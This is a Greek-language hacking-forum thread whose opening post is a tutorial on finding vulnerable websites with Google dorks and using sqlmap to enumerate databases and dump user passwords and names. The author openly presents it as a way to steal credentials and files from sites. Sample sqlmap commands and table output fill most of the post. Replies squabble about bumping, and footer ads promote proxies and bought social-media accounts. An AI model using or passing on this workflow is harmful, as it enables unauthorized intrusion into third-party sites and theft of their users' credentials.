Jump to content

Recommended Posts

Posted

Eiσαγωγη

Καλησπερα σε ολα  τα μελη και χαιρομαι που σας βρισκω μιας και ειναι το πρωτο μου ποστ στο section!

Οπως γραφει και στον τιττλο σημερα θα σας δειξω πως κανω εγω sql injection σε μια ιστοσελιδα και υποκλεπτω αρχεια ,κωδικους κτλπ.!

Tι θα χρειαστουμε?

Για να γινει αυτο θα χρειαστουμε λειτουργικο συστημα BackTrack R1!Eιναι λειτουργικο συστημα των Linux!Μη φοβαστε δεν χρειαζεται να βγαλετε τα windows σας η οτι αλλο χρησημοποιειτε!Θα ανεβασω αργοτερα ενα guide για το πως θα το τρεξετε!

Αρχικα πρεπει να βρουμε αν η σελιδα ειναι ευαλωτη σε επιθεσεις, για να το κανουμε αυτο θα χρειαστουμε καποιο προγραμμα! Παρακατω εχω 2 link με τετοια προγραμματα!

Downloads

 

Dork

 

XCodeExploitScanner

Πληροφοριες

Συνεχιζω...εκει που λεει Dork βαζετε τι τυπο σελιδας θελετε να ψαξει πχ αν θελετε για προιοντα inurl:product.php?mid= (θα σας βρει καποια που να σχετιζονται με προιοντα οχι ολα απλα ειναι ενας τροπος για να διαλεξεις που θα επιτεθεις) πατας dork it και σου εμφανιζει σελιδες,μετα Scan SQLi και ανιχνευει αν οι σελιδες ειναι ευαλωτες πατατε στο Open results καντε αντιγραφη και καντε επικολληση σε ενα αρχειο text  το οποιο θα μπορειτε να το κοιταξετε μετα με Backtrack

περιπου καθε μια αναζητηση που κανετε πρεπει να πατατε Show Captcha να βαζετε οτι βλεπετε στην εικονα ετσι ωστε να μην μπλοκαρει την ip σας η Google..

Ξεκινωντας Την Διαδικασια

Λοιπον Ανοιγουμε ενα τερματικο στο backtrack και γραφουμε 

cd /pentest/database/sqlmap 

,ωστε να ενεργοποιησουμε το sqlmap.Μετα γραφουμε

./sqlmap.py -u [ url ]--beep

πχ

./sqlmap.py -u http://www.selidathyma.com --beep 

Οταν ακουσετε ενα beep τοτε το sqlmap βρηκε ευαλωτη την σελιδα.Συνεχιζω εδω...μετα γραφουμε

./sqlmap.py -u [ url ] --dbs

π.χ

./sqlmap.py -u http://www.selidathyma.com --dbs

θα μας εμφανισει τα Database πχ

available databases [6]:

[*] dswa

[*] dswa_stage

[*] dswawordpress

[*] information_schema

[*] mysql

[*] test

./sqlmap.py -u [ url ] --tables -D [database]

μπορειτε να επιλεξετε οτι database θελετε και γραφετε παλι

πχ

./sqlmap.py -u http://www.selidathyma.com --tables -D dswa

 

Database: dswa

[table]

[tr]

[td][104 tables]

+-----------------------------------+

| access                         

| accesslog                   

| actions                       

| actions_aid                 

| advanced_help_index 

| authmap                     

| autologout                   

| batch                           

| blocks                         

| blocks_roles               

| boxes                           

| cache                           

| cache_block                     

| cache_content                   

| cache_filter                     

| cache_form                       

| cache_menu                       

| cache_page                       

| cache_update                     

| cache_views                     

| cache_views_data                 

| comments                         

| content_access                   

| content_field_headername         

| content_group                   

| content_group_fields             

| content_node_field               

| content_node_field_instance     

| content_type_education_center_sub

| content_type_find_alliance       

| content_type_member_home_page   

| content_type_member_page         

| content_type_page               

| content_type_page_ns             

| content_type_story               

| dswa_chapters_main               

| dswa_chapters_persons           

| dswa_eventuity_additional       

| dswa_eventuity_link             

| dswa_eventuity_main             

| dswa_profile_additional         

| dswa_profile_geographic         

| dswa_profile_images             

| dswa_profile_main               

| dswa_store_categories           

| dswa_store_featured             

| dswa_store_featured_sample       

| dswa_store_images               

| dswa_store_product_categories   

| dswa_store_products             

| dswa_taq_articles               

| dswa_taq_quotes                 

| dswa_taq_tips                   

| dswa_taq_topics                 

| dswa_teleclasses_additional     

| dswa_teleclasses_main           

| dswa_teleclasses_speakers       

| dswa_whatsnew_main               

| dswa_whatsnew_order             

| fckeditor_role                   

| fckeditor_settings               

| files                           

| filter_formats                   

| filters                         

| flood                           

| history                         

| menu_custom                     

| menu_links                       

| menu_router                     

| node                             

| node_access                     

| node_comment_statistics         

| node_counter                     

| node_revisions                   

| node_type                       

| performance_detail               

| performance_summary             

| permission                       

| profile_fields                   

| profile_values                   

| role                             

| search_dataset                   

| search_index                     

| search_node_links               

| search_total                     

| semaphore                       

| sessions                         

| system                           

| term_data                       

| term_hierarchy                   

| term_node                       

| term_relation                   

| term_synonym                     

| upload                           

| url_alias                       

| users                           

| users_roles                     

| variable                         

| views_display                   

| views_object_cache               

| views_view                       

| vocabulary                       

| vocabulary_node_types           

| watchdog[/td]

[/tr]

[/table]

./sqlmap.py -u [ url ] --columns -T [table name] -D [databasename]

 

Παραδειγμα

./sqlmap.py -u http://www.selidathyma.com --columns -T user -D dswa

Και αρχιζει βγαζει  τους users...Αλλο παραδειγμα..

./sqlmap.py -u [ url ] --dump -C [column] -T [table name] -D [databasename]

πχ

./sqlmap.py -u http://www.selidathyma.com --dump  -C pass -T users -D dswa

πχ εγω τωρα στοχευσα να επιτεθω και να ανακτησω ολους τους κωδικους απο τα μελη που ειναι γραμμενα στην σελιδα 8312631.png  <~~~ τσεκαρετε μια να δειτε.

π.χ

./sqlmap.py -u http://www.selidathyma.com --dump  -C name -T users -D dswa

, και εδω τα ονοματα που εκαναν εγγραφη σε αυτη την σελιδα ~~~> 8312648.png

Και ετσι μπορεις να υποκλεψεις στοιχεια απο διαφορες σελιδες..Τα παραπανω χρησημοποιηθηκαν σε δικο μου συστημα..Αυτος ο οδηγος ειναι παρανομος δεν ευθυνομαι για κακοβουλη χρηση του *ΠΡΟΣΟΧΗ μπορουνε να σας εντοπισουνε και να διωχθειτε ποινικα αν επιτεθειτε σε σελιδα.

Ερχονται καλυτερα ποστ !Ευχαριστω

 

Posted

Ρε φιλε γιατι στον πεοντα κανεις bump εισαι σε tutorial section οχι request.

Εαν ενδιαφερεται καποιος hacking θα κανει reply εδω η θα σε κανει pm.

Jesus.

Posted

Κανω για να ανεβουν λιγο τα ποστ και να επισκεπτοντε περισσοτεροι το section..

Αραξε λιγο φιλαρακο.

Σε καταλαβαινω οτι θελεις να ανεβει το section οπως θα το θελα και εγω, μα με αυτο π κανεις τωρα σκεψου οτι οταν ανεβει θα υπαρχουν αρκετα σχολια του τυπου bump.

 

Posted

Αραξε λιγο φιλαρακο.

Σε καταλαβαινω οτι θελεις να ανεβει το section οπως θα το θελα και εγω, μα με αυτο π κανεις τωρα σκεψου οτι οταν ανεβει θα υπαρχουν αρκετα σχολια του τυπου bump.

 

Ok ηταν λαθος! Δεν θα ξαναγινει..Να σου πω , καποιος παιζει με το reputation μου :/ πριν ειχα 1 τωρα 0 ..και νομιζω ξερω ποιος μου το αλλαξε και γιατι...
Posted

Ok ηταν λαθος! Δεν θα ξαναγινει..Να σου πω , καποιος παιζει με το reputation μου :/ πριν ειχα 1 τωρα 0 ..και νομιζω ξερω ποιος μου το αλλαξε και γιατι...

 

http://maxcheaters.com/forum/index.php?action=viewkarma

 

Elfo who else? :S

Posted

Ευχαριστω φιλε..Τι να πεις..!

 

Egw kai esu? tipota allos prepei na pei ... ekanan ena hacking sections kai apagorevonte ta dos otinane :/

 

 

Btw reported : http://maxcheaters.com/forum/index.php?topic=240156.

  • 2 weeks later...
  • 5 months later...
  • 4 weeks later...
  • 3 months later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



  • Posts

    • I have and selling the CMS that was used on the real L2Nostalgia.com server from 2012 and the PlusOneL2 project website and server files 🙂 if u are interested PM ME.  
    • Interlude x15 –  No soy el administrador de este servidor, pero es un nuevo proyecto que está muy bien configurado — ¡solo necesita una comunidad! Si estás buscando una experiencia nueva, equilibrada y emocionante en Interlude, este es el lugar. ¡Participa! Únete al servidor Trae tu clan o equipo ¡Ayuda a que el servidor crezca!   Fecha de Apertura 16 de Mayo de 2025 Horario de Apertura 19:00 GMT-3 Versión del Juego Interlude Versión de la Interfaz Classic (protocolo 166) Rates de EXP y SP Dinámicos Niveles 1 al 19: EXP 15, SP 10 Niveles 20 al 39: EXP 13, SP 7 Niveles 40 al 51: EXP 11, SP 3 Niveles 52 al 60: EXP 9, SP 3 Niveles 61 al 75: EXP 7, SP 1.5 Niveles 76+: EXP 2, SP 1 Otros Rates Adena: x1 Chance de Drop: x1 Chance de Spoil: x1 Cantidad de SealStone: x2 RB XP/SP: x3 RB Drop: x2 Configuraciones Únicas Hasta 3 cuentas por PC (2 gratis + 1 paga) Sistema de Enchant skill desactivado Sistema de Augment weapon desactivado Mana potion: efecto de 2000, reutilización de 15 segundos Sin auto-learn skill SP y Book para aprender skills Quests 1ª y 2ª Transferencia de Clase por Adena 3ª Transferencia de Clase por 700 Halisha Marks Subclase custom: solo hablar con las cajas de los 4 jefes Nobles Retail Recompensa de Transferencia de Profesión Recibe un ticket de 1ª profesión (artículos del starter pack) Recibe un ticket de 2ª profesión (Montura de Clase) Mejoras en el Auto-farm Hemos reestructurado la IA del auto-farm Corregida la zona de caza Configuraciones de alcance de la caza automática Clanes y Alianzas Máximo de miembros por clan: 25 miembros Máximo de clanes por alianza: 1 clan El clan ya inicia nivel 8, sin reputación y sin skills Comandos Dentro del Juego .cfg - Para ajustar configuraciones del juego .instancezone - Verificar el tiempo de instancias .sellbuff - Para comenzar a vender buffs .topclan - Para verificar el top clan .acp - Para usar el sistema de auto potion Bono de EXP Extra en la Party 6 miembros: 20% 7 miembros: 30% 8 miembros: 40% 9 miembros: 50% NPC Buff Duración: 1 hora Total de buffs: 24 + 4 (Divine Inspiration) Buffs básicos sin protección y sin profecías   Join  >> DISCORD <<    
    • 🚀 MoMoProxy Static Residential Proxies For Sale!     🔹 Stable, secure & high-anonymity 🔹 >10Mbps speed, <10ms latency 🔹 99.99% uptime & static IPs 🔹 Unlimited traffic & connections 🌍 30M+ clean residential IPs ✅ Whitelist & user/pass auth 💳 Flexible plans (7/30/90 days) 💰 From $3/IP (Pay-per-IP) 🔥 Perfect for: ✔️ Ad verification ✔️ E-commerce/social media ✔️ Data scraping ✔️ Anti-detect browsers 🆓 Start free trial today! 🔗 [Insert Link] #Proxy #ResidentialProxies #WebScraping #DigitalMarketing   1/ Why Choose MoMoProxy? ✅ Global ISP network (30M+ IPs) ✅ Dedicated dashboard for easy management ✅ 24/7 stable operation ✅ HTTP(S)/SOCKS5 support 2/ Use Cases: 📊 Ad fraud detection 🛒 Sneaker copping & e-com 📱 Social media automation 🌐 Travel aggregation & more! 3/ Get Started in 4 Steps: A. Pick MoMoProxy B. Grab your IP credentials C. Configure your tool D. Enjoy unlimited sessions!   https://momoproxy.com/static-residential-proxies https://momoproxy.com/static-residential-proxies https://momoproxy.com/static-residential-proxies    
    • ➡ Discount for your purchase: MAY2025 (10% discount) ➡ Our Online Shop: https://socnet.store  ➡ Our SMM-Boosting Panel: https://socnet.pro  ➡ Telegram Shop Bot: https://socnet.shop  ➡ Telegram Support: https://t.me/solomon_bog  ➡ Telegram Channel: https://t.me/accsforyou_shop  ➡ Discord Support: @AllSocialNetworksShop  ➡ Discord Server: https://discord.gg/y9AStFFsrh  ➡ WhatsApp Support: https://wa.me/79051904467 ➡ WhatsApp Channel: https://whatsapp.com/channel/0029Vau0CMX002TGkD4uHa2n  ➡ Email Support: solomonbog@socnet.store 
  • Topics

×
×
  • Create New...